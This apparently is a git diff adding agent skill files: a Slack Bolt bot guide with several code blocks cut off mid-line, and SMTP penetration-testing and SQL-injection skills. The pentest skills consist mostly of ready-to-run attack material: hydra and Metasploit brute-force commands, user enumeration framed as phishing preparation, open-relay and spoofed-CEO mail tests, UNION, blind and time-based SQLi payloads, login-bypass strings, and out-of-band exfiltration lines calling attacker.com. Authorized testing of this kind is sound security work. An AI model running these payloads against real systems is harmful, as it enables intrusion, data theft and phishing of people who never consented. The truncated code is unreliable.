scopes="read_products"
|
||||
)
|
||||
|
||||
assert config.shopify_api_key == "key"
|
||||
assert config.shopify_api_secret == "secret"
|
||||
assert config.shop_domain == "test.myshopify.com"
|
||||
assert config.scopes == "read_products"
|
||||
264
skills/slack-bot-builder/SKILL.md
Normal file
@@ -0,0 +1,264 @@
---
name: slack-bot-builder
description: "Build Slack apps using the Bolt framework across Python, JavaScript, and Java. Covers Block Kit for rich UIs, interactive components, slash commands, event handling, OAuth installation flows, and Workflow Builder integration. Focus on best practices for production-ready Slack apps. Use when: slack bot, slack app, bolt framework, block kit, slash command."
source: vibeship-spawner-skills (Apache 2.0)
---

# Slack Bot Builder

## Patterns

### Bolt App Foundation Pattern

The Bolt framework is Slack's recommended approach for building apps.
It handles authentication, event routing, request verification, and
HTTP request processing so you can focus on app logic.

Key benefits:
- Event handling in a few lines of code
- Security checks and payload validation built in
- Organized, consistent patterns
- Works for experiments and production

Available in: Python, JavaScript (Node.js), Java

**When to use**: Starting any new Slack app; migrating from legacy Slack APIs; building production Slack integrations

```python
# Python Bolt App
from slack_bolt import App
from slack_bolt.adapter.socket_mode import SocketModeHandler
import os

# Initialize with tokens from environment
app = App(
    token=os.environ["SLACK_BOT_TOKEN"],
    signing_secret=os.environ["SLACK_SIGNING_SECRET"]
)

# Handle messages containing "hello"
@app.message("hello")
def handle_hello(message, say):
    """Respond to messages containing 'hello'."""
    user = message["user"]
    say(f"Hey there <@{user}>!")

# Handle slash command
@app.command("/ticket")
def handle_ticket_command(ack, body, client):
    """Handle /ticket slash command."""
    # Acknowledge immediately (within 3 seconds)
    ack()

    # Open a modal for ticket creation
    client.views_open(
        trigger_id=body["trigger_id"],
        view={
            "type": "modal",
            "callback_id": "ticket_modal",
            "title": {"type": "plain_text", "text": "Create Ticket"},
            "submit": {"type": "plain_text", "text": "Submit"},
            "blocks": [
                {
                    "type": "input",
                    "block_id": "title_block",
                    "element": {
                        "type": "plain_text_input",
                        "action_id": "title_input"
                    },
                    "label": {"type": "plain_text", "text": "Title"}
                },
                {
                    "type": "input",
                    "block_id": "desc_block",
                    "element": {
                        "type": "plain_text_input",
                        "multiline": True,
                        "action_id": "desc_input"
                    },
                    "label": {"type": "plain_text", "text": "Description"}
                },
                {
                    "type": "input",
                    "block_id": "priority_block",
                    "element": {
                        "type": "static_select",
                        "action_id": "priority_select",

```
### Block Kit UI Pattern

Block Kit is Slack's UI framework for building rich, interactive messages.
Compose messages using blocks (sections, actions, inputs) and elements
(buttons, menus, text inputs).

Limits:
- Up to 50 blocks per message
- Up to 100 blocks in modals/Home tabs
- Block text limited to 3000 characters

Use Block Kit Builder to prototype: https://app.slack.com/block-kit-builder

**When to use**: Building rich message layouts; adding interactive components to messages; creating forms in modals; building Home tab experiences

```python
from slack_bolt import App
import os

app = App(token=os.environ["SLACK_BOT_TOKEN"])

def build_notification_blocks(incident: dict) -> list:
    """Build Block Kit blocks for incident notification."""
    severity_emoji = {
        "critical": ":red_circle:",
        "high": ":large_orange_circle:",
        "medium": ":large_yellow_circle:",
        "low": ":white_circle:"
    }

    return [
        # Header
        {
            "type": "header",
            "text": {
                "type": "plain_text",
                "text": f"{severity_emoji.get(incident['severity'], '')} Incident Alert"
            }
        },
        # Details section
        {
            "type": "section",
            "fields": [
                {
                    "type": "mrkdwn",
                    "text": f"*Incident:*\n{incident['title']}"
                },
                {
                    "type": "mrkdwn",
                    "text": f"*Severity:*\n{incident['severity'].upper()}"
                },
                {
                    "type": "mrkdwn",
                    "text": f"*Service:*\n{incident['service']}"
                },
                {
                    "type": "mrkdwn",
                    # Double braces keep {date_short} and {time} literal for Slack's date formatting
                    "text": f"*Reported:*\n<!date^{incident['timestamp']}^{{date_short}} {{time}}|{incident['timestamp']}>"
                }
            ]
        },
        # Description
        {
            "type": "section",
            "text": {
                "type": "mrkdwn",
                "text": f"*Description:*\n{incident['description'][:2000]}"
            }
        },
        # Divider
        {"type": "divider"},
        # Action buttons
        {
            "type": "actions",
            "block_id": f"incident_actions_{incident['id']}",
            "elements": [
                {
                    "type": "button",
                    "text": {"type": "plain_text", "text": "Acknowledge"},
                    "style": "primary",
                    "action_id": "acknowle
```
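The limits listed above are easy to trip at runtime, so it is worth checking payloads before sending. A minimal sketch assuming the documented caps (50 blocks per message, 3000 characters of section text); `validate_blocks` is a hypothetical helper, not part of the Slack SDK:

```python
# Hypothetical pre-send validator for the Block Kit limits described above.
MAX_MESSAGE_BLOCKS = 50   # per message (modals/Home tabs allow up to 100)
MAX_SECTION_TEXT = 3000   # characters of block text

def validate_blocks(blocks: list) -> list:
    """Return a list of human-readable limit violations (empty if OK)."""
    problems = []
    if len(blocks) > MAX_MESSAGE_BLOCKS:
        problems.append(f"too many blocks: {len(blocks)} > {MAX_MESSAGE_BLOCKS}")
    for i, block in enumerate(blocks):
        text = block.get("text", {})
        # Section/header blocks carry a {"type": ..., "text": ...} object
        if isinstance(text, dict) and len(text.get("text", "")) > MAX_SECTION_TEXT:
            problems.append(f"block {i}: text exceeds {MAX_SECTION_TEXT} chars")
    return problems
```

Running such a check before `chat.postMessage` turns an opaque `invalid_blocks` API error into an actionable message during development.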

### OAuth Installation Pattern

Enable users to install your app in their workspaces via OAuth 2.0.
Bolt handles most of the OAuth flow, but you need to configure it
and store tokens securely.

Key OAuth concepts:
- Scopes define permissions (request minimum needed)
- Tokens are workspace-specific
- Installation data must be stored persistently
- Users can add scopes later (additive)

70% of users abandon installation when confronted with excessive
permission requests - request only what you need!

**When to use**: Distributing app to multiple workspaces; building public Slack apps; enterprise-grade integrations

```python
from slack_bolt import App
from slack_bolt.oauth.oauth_settings import OAuthSettings
from slack_sdk.oauth.installation_store import FileInstallationStore
from slack_sdk.oauth.state_store import FileOAuthStateStore
import os

# For production, use database-backed stores
# For example: PostgreSQL, MongoDB, Redis

class DatabaseInstallationStore:
    """Store installation data in your database."""

    async def save(self, installation):
        """Save installation when user completes OAuth."""
        await db.installations.upsert({
            "team_id": installation.team_id,
            "enterprise_id": installation.enterprise_id,
            "bot_token": encrypt(installation.bot_token),
            "bot_user_id": installation.bot_user_id,
            "bot_scopes": installation.bot_scopes,
            "user_id": installation.user_id,
            "installed_at": installation.installed_at
        })

    async def find_installation(self, *, enterprise_id, team_id, user_id=None, is_enterprise_install=False):
        """Find installation for a workspace."""
        record = await db.installations.find_one({
            "team_id": team_id,
            "enterprise_id": enterprise_id
        })

        if record:
            return Installation(
                bot_token=decrypt(record["bot_token"]),
                # ... other fields
            )
        return None

# Initialize OAuth-enabled app
app = App(
    signing_secret=os.environ["SLACK_SIGNING_SECRET"],
    oauth_settings=OAuthSettings(
        client_id=os.environ["SLACK_CLIENT_ID"],
        client_secret=os.environ["SLACK_CLIENT_SECRET"],
        scopes=[
            "channels:history",
            "channels:read",
            "chat:write",
            "commands",
            "users:read"
        ],
        user_scopes=[],  # User token scopes if needed
        installation_store=DatabaseInstallationStore(),
        state_store=FileOAuthStateStore(expiration_seconds=600)
    )
)

# OAuth routes are handled a
```

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Slow slash-command acknowledgement (3-second limit) | critical | Acknowledge immediately, process later |
| OAuth state handling (CSRF) | critical | Proper state validation |
| Token exposure | critical | Never hardcode or log tokens |
| Over-broad OAuth scopes | high | Request minimum required scopes |
| Block Kit size limits | medium | Know and respect the limits |
| Socket Mode in production | high | Socket Mode: only for development |
| Request signature verification | critical | Bolt handles this automatically |
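The "acknowledge immediately, process later" rule is framework-independent. A minimal sketch using only the standard library, with hypothetical names (`handle_command`, `worker`, not Bolt APIs): the handler only enqueues and returns, while a background thread does the slow work.

```python
import queue
import threading

# Hypothetical sketch of ack-then-process: the command handler must return
# fast, so the expensive work is pushed to a worker thread via a queue.
jobs: "queue.Queue" = queue.Queue()
results = []

def worker() -> None:
    while True:
        job = jobs.get()
        if job is None:            # sentinel: shut the worker down
            break
        results.append(f"processed {job['id']}")   # the slow part
        jobs.task_done()

def handle_command(payload: dict) -> str:
    jobs.put(payload)              # fast: just enqueue
    return "ack"                   # returned well within the deadline

t = threading.Thread(target=worker, daemon=True)
t.start()
ack = handle_command({"id": 1})
jobs.join()                        # demo only: wait for the worker to finish
jobs.put(None)
t.join()
```

In a real Bolt app the queue would typically be an external broker (Redis, SQS) so retries survive a process restart.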
497
skills/smtp-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,497 @@
---
name: SMTP Penetration Testing
description: This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". It provides comprehensive techniques for testing SMTP server security.
---

# SMTP Penetration Testing

## Purpose

Conduct comprehensive security assessments of SMTP (Simple Mail Transfer Protocol) servers to identify vulnerabilities including open relays, user enumeration, weak authentication, and misconfiguration. This skill covers banner grabbing, user enumeration techniques, relay testing, brute force attacks, and security hardening recommendations.

## Prerequisites

### Required Tools
```bash
# Nmap with SMTP scripts
sudo apt-get install nmap

# Netcat
sudo apt-get install netcat

# Hydra for brute force
sudo apt-get install hydra

# SMTP user enumeration tool
sudo apt-get install smtp-user-enum

# Metasploit Framework
msfconsole
```

### Required Knowledge
- SMTP protocol fundamentals
- Email architecture (MTA, MDA, MUA)
- DNS and MX records
- Network protocols

### Required Access
- Target SMTP server IP/hostname
- Written authorization for testing
- Wordlists for enumeration and brute force

## Outputs and Deliverables

1. **SMTP Security Assessment Report** - Comprehensive vulnerability findings
2. **User Enumeration Results** - Valid email addresses discovered
3. **Relay Test Results** - Open relay status and exploitation potential
4. **Remediation Recommendations** - Security hardening guidance

## Core Workflow

### Phase 1: SMTP Architecture Understanding

```
Components: MTA (transfer) → MDA (delivery) → MUA (client)

Ports: 25 (SMTP), 465 (SMTPS), 587 (submission), 2525 (alternative)

Workflow: Sender MUA → Sender MTA → DNS/MX → Recipient MTA → MDA → Recipient MUA
```

### Phase 2: SMTP Service Discovery

Identify SMTP servers and versions:

```bash
# Discover SMTP ports
nmap -p 25,465,587,2525 -sV TARGET_IP

# Aggressive service detection
nmap -sV -sC -p 25 TARGET_IP

# SMTP-specific scripts
nmap --script=smtp-* -p 25 TARGET_IP

# Discover MX records for domain
dig MX target.com
nslookup -type=mx target.com
host -t mx target.com
```

### Phase 3: Banner Grabbing

Retrieve SMTP server information:

```bash
# Using Telnet
telnet TARGET_IP 25
# Response: 220 mail.target.com ESMTP Postfix

# Using Netcat
nc TARGET_IP 25
# Response: 220 mail.target.com ESMTP

# Using Nmap
nmap -sV -p 25 TARGET_IP
# Version detection extracts banner info

# Manual SMTP commands
EHLO test
# Response reveals supported extensions
```

Parse banner information:

```
Banner reveals:
- Server software (Postfix, Sendmail, Exchange)
- Version information
- Hostname
- Supported SMTP extensions (STARTTLS, AUTH, etc.)
```
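The banner fields above can be split out programmatically. A minimal sketch assuming the common `220 <hostname> <software>` greeting shape; real banners vary, and `parse_banner` is a hypothetical helper:

```python
# Hypothetical parser for a typical SMTP greeting line.
def parse_banner(banner: str) -> dict:
    """Split '220 host software...' into code, hostname, and software."""
    parts = banner.strip().split()
    info = {"code": None, "hostname": None, "software": None}
    if parts and parts[0].isdigit():
        info["code"] = int(parts[0])          # SMTP reply code, e.g. 220
    if len(parts) > 1:
        info["hostname"] = parts[1]           # advertised hostname
    if len(parts) > 2:
        info["software"] = " ".join(parts[2:])  # everything after the host
    return info

print(parse_banner("220 mail.target.com ESMTP Postfix"))
```

Collecting parsed banners across a scan makes it easy to sort targets by disclosed software.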

### Phase 4: SMTP Command Enumeration

Test available SMTP commands:

```bash
# Connect and test commands
nc TARGET_IP 25

# Initial greeting
EHLO attacker.com

# Response shows capabilities:
250-mail.target.com
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-8BITMIME
250 DSN
```

Key commands to test:

```bash
# VRFY - Verify user exists
VRFY admin
250 2.1.5 admin@target.com

# EXPN - Expand mailing list
EXPN staff
250 2.1.5 user1@target.com
250 2.1.5 user2@target.com

# RCPT TO - Recipient verification
MAIL FROM:<test@attacker.com>
RCPT TO:<admin@target.com>
# 250 OK = user exists
# 550 = user doesn't exist
```
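Interpreting the VRFY/RCPT replies above can be automated. A hedged sketch: 250/252 generally mean the address was accepted, 550/551/553 that it was rejected, anything else is ambiguous. `user_likely_exists` is a hypothetical helper, and catch-all servers can make the positive signal unreliable:

```python
from typing import Optional

# Hypothetical classifier for VRFY / EXPN / RCPT TO replies.
def user_likely_exists(reply: str) -> Optional[bool]:
    """True/False when the reply code is decisive, None when ambiguous."""
    code = reply.strip()[:3]
    if code in {"250", "252"}:        # accepted (or "cannot verify, will try")
        return True
    if code in {"550", "551", "553"}:  # rejected / unknown mailbox
        return False
    return None                        # temporary failures, odd codes, etc.
```

Feeding each wordlist candidate's reply through this keeps the enumeration loop free of string matching on server-specific messages.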

### Phase 5: User Enumeration

Enumerate valid email addresses:

```bash
# Using smtp-user-enum with VRFY
smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t TARGET_IP

# Using EXPN method
smtp-user-enum -M EXPN -U /usr/share/wordlists/users.txt -t TARGET_IP

# Using RCPT method
smtp-user-enum -M RCPT -U /usr/share/wordlists/users.txt -t TARGET_IP

# Specify port and domain
smtp-user-enum -M VRFY -U users.txt -t TARGET_IP -p 25 -d target.com
```

Using Metasploit:

```bash
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARGET_IP
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
set UNIXONLY true
run
```

Using Nmap:

```bash
# SMTP user enumeration script
nmap --script smtp-enum-users -p 25 TARGET_IP

# With custom user list
nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -p 25 TARGET_IP
```

### Phase 6: Open Relay Testing

Test for unauthorized email relay:

```bash
# Using Nmap
nmap -p 25 --script smtp-open-relay TARGET_IP

# Manual testing via Telnet
telnet TARGET_IP 25
HELO attacker.com
MAIL FROM:<test@attacker.com>
RCPT TO:<victim@external-domain.com>
DATA
Subject: Relay Test
This is a test.
.
QUIT

# If accepted (250 OK), server is open relay
```

Using Metasploit:

```bash
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS TARGET_IP
run
```

Test variations:

```bash
# Test different sender/recipient combinations
MAIL FROM:<>
MAIL FROM:<test@[attacker_IP]>
MAIL FROM:<test@target.com>

RCPT TO:<test@external.com>
RCPT TO:<"test@external.com">
RCPT TO:<test%external.com@target.com>
```
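The manual relay test above can also be scripted with the standard library's `smtplib`. A sketch for authorized testing only; `probe_relay` and `interpret_rcpt` are hypothetical names, and the addresses are placeholders:

```python
import smtplib

# Hypothetical interpretation of the RCPT TO reply during a relay probe.
def interpret_rcpt(code: int) -> str:
    if 200 <= code < 300:
        return "accepted (possible open relay)"
    if code in (550, 551, 553, 554):
        return "rejected (relay denied)"
    return f"inconclusive ({code})"

def probe_relay(host: str, port: int = 25) -> str:
    """Try an external->external recipient; only run with written authorization."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.ehlo("attacker.example")
        smtp.mail("test@attacker.example")
        code, _msg = smtp.rcpt("victim@external.example")
        smtp.rset()                      # abort the transaction, send nothing
        return interpret_rcpt(code)
```

Note the `rset()` call: the probe never reaches `DATA`, so no message is actually relayed even against a vulnerable server.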

### Phase 7: Brute Force Authentication

Test for weak SMTP credentials:

```bash
# Using Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt smtp://TARGET_IP

# With specific port and SSL
hydra -l admin -P passwords.txt -s 465 -S TARGET_IP smtp

# Multiple users
hydra -L users.txt -P passwords.txt TARGET_IP smtp

# Verbose output
hydra -l admin -P passwords.txt smtp://TARGET_IP -V
```

Using Medusa:

```bash
medusa -h TARGET_IP -u admin -P /path/to/passwords.txt -M smtp
```

Using Metasploit:

```bash
use auxiliary/scanner/smtp/smtp_login
set RHOSTS TARGET_IP
set USER_FILE /path/to/users.txt
set PASS_FILE /path/to/passwords.txt
set VERBOSE true
run
```

### Phase 8: SMTP Command Injection

Test for command injection vulnerabilities:

```bash
# Header injection test
MAIL FROM:<attacker@test.com>
RCPT TO:<victim@target.com>
DATA
Subject: Test
Bcc: hidden@attacker.com
X-Injected: malicious-header

Injected content
.
```

Email spoofing test:

```bash
# Spoofed sender (tests SPF/DKIM protection)
MAIL FROM:<ceo@target.com>
RCPT TO:<employee@target.com>
DATA
From: CEO <ceo@target.com>
Subject: Urgent Request
Please process this request immediately.
.
```

### Phase 9: TLS/SSL Security Testing

Test encryption configuration:

```bash
# STARTTLS support check
openssl s_client -connect TARGET_IP:25 -starttls smtp

# Direct SSL (port 465)
openssl s_client -connect TARGET_IP:465

# Cipher enumeration
nmap --script ssl-enum-ciphers -p 25 TARGET_IP
```

### Phase 10: SPF, DKIM, DMARC Analysis

Check email authentication records:

```bash
# SPF/DKIM/DMARC record lookups
dig TXT target.com | grep spf            # SPF
dig TXT selector._domainkey.target.com   # DKIM
dig TXT _dmarc.target.com                # DMARC

# SPF policy: -all = strict fail, ~all = soft fail, ?all = neutral
```
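The `all` qualifier semantics noted above can be checked mechanically once the TXT record is in hand. A minimal sketch over a raw SPF string; `spf_all_policy` is a hypothetical helper:

```python
# Hypothetical classifier for the terminal "all" mechanism of an SPF record.
def spf_all_policy(txt: str) -> str:
    policies = {
        "-all": "hard fail",            # strict: reject unlisted senders
        "~all": "soft fail",            # mark but usually accept
        "?all": "neutral",              # no assertion
        "+all": "pass (dangerous)",     # anyone may send as the domain
    }
    for mech in txt.split():
        if mech in policies:
            return policies[mech]
    return "no explicit all mechanism"

print(spf_all_policy("v=spf1 ip4:203.0.113.0/24 include:_spf.example.com -all"))
```

A domain reporting anything weaker than "hard fail" is worth flagging in the assessment, since spoofed mail from it is more likely to be delivered.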

## Quick Reference

### Essential SMTP Commands

| Command | Purpose | Example |
|---------|---------|---------|
| HELO | Identify client | `HELO client.com` |
| EHLO | Extended HELO | `EHLO client.com` |
| MAIL FROM | Set sender | `MAIL FROM:<sender@test.com>` |
| RCPT TO | Set recipient | `RCPT TO:<user@target.com>` |
| DATA | Start message body | `DATA` |
| VRFY | Verify user | `VRFY admin` |
| EXPN | Expand alias | `EXPN staff` |
| QUIT | End session | `QUIT` |

### SMTP Response Codes

| Code | Meaning |
|------|---------|
| 220 | Service ready |
| 221 | Closing connection |
| 250 | OK / Requested action completed |
| 354 | Start mail input |
| 421 | Service not available |
| 450 | Mailbox unavailable |
| 550 | User unknown / Mailbox not found |
| 553 | Mailbox name not allowed |

### Enumeration Tool Commands

| Tool | Command |
|------|---------|
| smtp-user-enum | `smtp-user-enum -M VRFY -U users.txt -t IP` |
| Nmap | `nmap --script smtp-enum-users -p 25 IP` |
| Metasploit | `use auxiliary/scanner/smtp/smtp_enum` |
| Netcat | `nc IP 25` then manual commands |

### Common Vulnerabilities

| Vulnerability | Risk | Test Method |
|--------------|------|-------------|
| Open Relay | High | Relay test with external recipient |
| User Enumeration | Medium | VRFY/EXPN/RCPT commands |
| Banner Disclosure | Low | Banner grabbing |
| Weak Auth | High | Brute-force attack |
| No TLS | Medium | STARTTLS test |
| Missing SPF/DKIM | Medium | DNS record lookup |

## Constraints and Limitations

### Legal Requirements

- Only test SMTP servers you own or are authorized to test
- Sending spam or malicious email is illegal
- Document all testing activities
- Do not abuse discovered open relays

### Technical Limitations

- VRFY/EXPN are often disabled on modern servers
- Rate limiting may slow enumeration
- Some servers respond identically for valid and invalid users
- Greylisting may delay enumeration responses

### Ethical Boundaries

- Never send actual spam through discovered relays
- Do not harvest email addresses for malicious use
- Report open relays to server administrators
- Use findings only for authorized security improvement

## Examples

### Example 1: Complete SMTP Assessment

**Scenario:** Full security assessment of a mail server

```bash
# Step 1: Service discovery
nmap -sV -sC -p 25,465,587 mail.target.com

# Step 2: Banner grab
nc mail.target.com 25
EHLO test.com
QUIT

# Step 3: User enumeration
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t mail.target.com

# Step 4: Open relay test
nmap -p 25 --script smtp-open-relay mail.target.com

# Step 5: Authentication test
hydra -l admin -P /usr/share/wordlists/fasttrack.txt smtp://mail.target.com

# Step 6: TLS check
openssl s_client -connect mail.target.com:25 -starttls smtp

# Step 7: Check email authentication
dig TXT target.com | grep spf
dig TXT _dmarc.target.com
```

### Example 2: User Enumeration Attack

**Scenario:** Enumerate valid users in preparation for phishing

```bash
# Method 1: VRFY
smtp-user-enum -M VRFY -U users.txt -t 192.168.1.100 -p 25

# Method 2: RCPT with timing analysis
smtp-user-enum -M RCPT -U users.txt -t 192.168.1.100 -p 25 -d target.com

# Method 3: Metasploit
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
run

# Results show valid users
[+] 192.168.1.100:25 - Found user: admin
[+] 192.168.1.100:25 - Found user: root
[+] 192.168.1.100:25 - Found user: postmaster
```
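Under the hood, these tools decide validity from the numeric SMTP reply code to each VRFY/RCPT probe; a minimal sketch of that classification logic (codes follow the response-code table above, and the "inconclusive" bucket for 252 reflects servers that refuse to verify):

```python
# Classify a VRFY/RCPT reply code as valid / invalid / inconclusive.
def classify_vrfy_reply(code: int) -> str:
    if code in (250, 251):        # user verified, or will be forwarded
        return "valid"
    if code == 252:               # server refuses to verify: no signal
        return "inconclusive"
    if code in (550, 551, 553):   # mailbox unknown or not allowed
        return "invalid"
    return "inconclusive"         # anything else: treat conservatively

print(classify_vrfy_reply(250))  # valid
print(classify_vrfy_reply(550))  # invalid
```

When a server returns 252 (or the same code for every name), fall back to the RCPT timing analysis shown in Method 2.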

### Example 3: Open Relay Exploitation

**Scenario:** Test and document an open relay vulnerability

```bash
# Test via Telnet
telnet mail.target.com 25
HELO attacker.com
MAIL FROM:<test@attacker.com>
RCPT TO:<test@gmail.com>
# If 250 OK - VULNERABLE

# Document with Nmap
nmap -p 25 --script smtp-open-relay --script-args smtp-open-relay.from=test@attacker.com,smtp-open-relay.to=test@external.com mail.target.com

# Output:
# PORT   STATE SERVICE
# 25/tcp open  smtp
# |_smtp-open-relay: Server is an open relay (14/16 tests)
```

## Troubleshooting

| Issue | Cause | Solution |
|-------|-------|----------|
| Connection refused | Port blocked or closed | Check port with nmap; ISP may block port 25; try 587/465; use a VPN |
| VRFY/EXPN disabled | Server hardened | Use the RCPT TO method; analyze response time/code variations |
| Brute force blocked | Rate limiting/lockout | Slow down (`hydra -W 5`); use password spraying; check for fail2ban |
| SSL/TLS errors | Wrong port or protocol | Use 465 for SSL, 25/587 for STARTTLS; verify the EHLO response |

## Security Recommendations

### For Administrators

1. **Disable Open Relay** - Require authentication for external delivery
2. **Disable VRFY/EXPN** - Prevent user enumeration
3. **Enforce TLS** - Require STARTTLS for all connections
4. **Implement SPF/DKIM/DMARC** - Prevent email spoofing
5. **Rate Limiting** - Prevent brute-force attacks
6. **Account Lockout** - Lock accounts after failed attempts
7. **Banner Hardening** - Minimize server information disclosure
8. **Log Monitoring** - Alert on suspicious activity
9. **Patch Management** - Keep SMTP software updated
10. **Access Controls** - Restrict SMTP to authorized IPs
---

**skills/sql-injection-testing/SKILL.md** (new file, 445 lines)

---
name: SQL Injection Testing
description: This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems.
---

# SQL Injection Testing

## Purpose

Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization mechanisms. This skill enables systematic detection and exploitation of SQL injection vulnerabilities across in-band, blind, and out-of-band attack vectors to assess application security posture.

## Inputs / Prerequisites

### Required Access
- Target web application URL with injectable parameters
- Burp Suite or equivalent proxy tool for request manipulation
- SQLMap installation for automated exploitation
- Browser with developer tools enabled

### Technical Requirements
- Understanding of SQL query syntax (MySQL, MSSQL, PostgreSQL, Oracle)
- Knowledge of the HTTP request/response cycle
- Familiarity with database schemas and structures
- Write permissions for testing reports

### Legal Prerequisites
- Written authorization for penetration testing
- Defined scope including target URLs and parameters
- Emergency contact procedures established
- Data handling agreements in place

## Outputs / Deliverables

### Primary Outputs
- SQL injection vulnerability report with severity ratings
- Extracted database schemas and table structures
- Authentication bypass proof-of-concept demonstrations
- Remediation recommendations with code examples

### Evidence Artifacts
- Screenshots of successful injections
- HTTP request/response logs
- Database dumps (sanitized)
- Payload documentation

## Core Workflow

### Phase 1: Detection and Reconnaissance

#### Identify Injectable Parameters
Locate user-controlled input fields that interact with database queries:

```
# Common injection points
- URL parameters: ?id=1, ?user=admin, ?category=books
- Form fields: username, password, search, comments
- Cookie values: session_id, user_preference
- HTTP headers: User-Agent, Referer, X-Forwarded-For
```

#### Test for Basic Vulnerability Indicators
Insert special characters to trigger error responses:

```sql
-- Single quote test
'

-- Double quote test
"

-- Comment sequences
--
#
/**/

-- Semicolon for query stacking
;

-- Parentheses
)
```

Monitor application responses for:
- Database error messages revealing query structure
- Unexpected application behavior changes
- HTTP 500 Internal Server Error responses
- Modified response content or length

#### Logic Testing Payloads
Verify boolean-based vulnerability presence:

```sql
-- True condition tests
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--

-- False condition tests
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2--
```

Compare responses between true and false conditions to confirm injection capability.
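That comparison is easy to automate by diffing the baseline, true-condition, and false-condition responses; a minimal sketch of the decision heuristic (the response bodies here are stand-ins for real HTTP responses fetched with the payloads above):

```python
# Boolean-based SQLi heuristic: the parameter looks injectable when the
# TRUE-condition response matches the baseline but the FALSE one differs.
def looks_boolean_injectable(baseline: str, true_resp: str, false_resp: str) -> bool:
    return true_resp == baseline and false_resp != baseline

baseline = "<h1>Widget #5</h1><p>In stock</p>"
print(looks_boolean_injectable(baseline, baseline, "<h1>No results</h1>"))  # True
print(looks_boolean_injectable(baseline, baseline, baseline))               # False
```

Real scanners compare content length and similarity ratios rather than exact equality, since dynamic pages rarely return byte-identical bodies twice.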

### Phase 2: Exploitation Techniques

#### UNION-Based Extraction
Combine attacker-controlled SELECT statements with the original query:

```sql
-- Determine column count
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- Continue until an error occurs

-- Find displayable columns
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--

-- Extract data
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
```

#### Error-Based Extraction
Force database errors that leak information:

```sql
-- MSSQL version extraction
1' AND 1=CONVERT(int,(SELECT @@version))--

-- MySQL extraction via XPATH
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--

-- PostgreSQL cast errors
1' AND 1=CAST((SELECT version()) AS int)--
```

#### Blind Boolean-Based Extraction
Infer data through application behavior changes:

```sql
-- Character extraction
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--

-- Conditional responses
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
```

#### Time-Based Blind Extraction
Use database sleep functions for confirmation:

```sql
-- MySQL
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--

-- MSSQL
1'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL
1'; SELECT pg_sleep(5)--
```
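Blind extraction is just a loop over an oracle that answers one yes/no question per request; a minimal sketch with a stub oracle standing in for the injection (a real implementation would send the `SUBSTRING`/`SLEEP` payload above and measure the response time, and the secret value here is invented for the demo):

```python
import string

SECRET = "admin7"  # stands in for the value held by the database

def oracle(position: int, guess: str) -> bool:
    """Stub for: does SUBSTRING(secret, position+1, 1) equal guess?
    A real oracle would inject the payload and time the response."""
    return position < len(SECRET) and SECRET[position] == guess

def extract(max_len: int = 32) -> str:
    recovered = ""
    for pos in range(max_len):
        for ch in string.ascii_lowercase + string.digits:
            if oracle(pos, ch):
                recovered += ch
                break
        else:
            break  # no character matched: end of value reached
    return recovered

print(extract())  # admin7
```

With a 36-character alphabet this costs up to 36 requests per character, which is why time-based blind extraction is so much slower than UNION or error-based techniques.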

#### Out-of-Band (OOB) Extraction
Exfiltrate data through external channels:

```sql
-- MSSQL DNS exfiltration
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--

-- MySQL DNS exfiltration
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--

-- Oracle HTTP request
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
```

### Phase 3: Authentication Bypass

#### Login Form Exploitation
Craft payloads to bypass credential verification:

```sql
-- Classic bypass
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--

-- Username enumeration
admin' AND '1'='1
admin' AND '1'='2
```

Query transformation example:
```sql
-- Original query
SELECT * FROM users WHERE username='input' AND password='input'

-- Injected (username: admin'--)
SELECT * FROM users WHERE username='admin'--' AND password='anything'
-- Password check bypassed via comment
```
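The corresponding remediation is parameterized queries, where the payload is bound as data instead of being concatenated into SQL; a runnable sqlite3 sketch contrasting the two (the table and credentials are illustrative):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

user, pwd = "admin'--", "anything"  # the classic bypass payload

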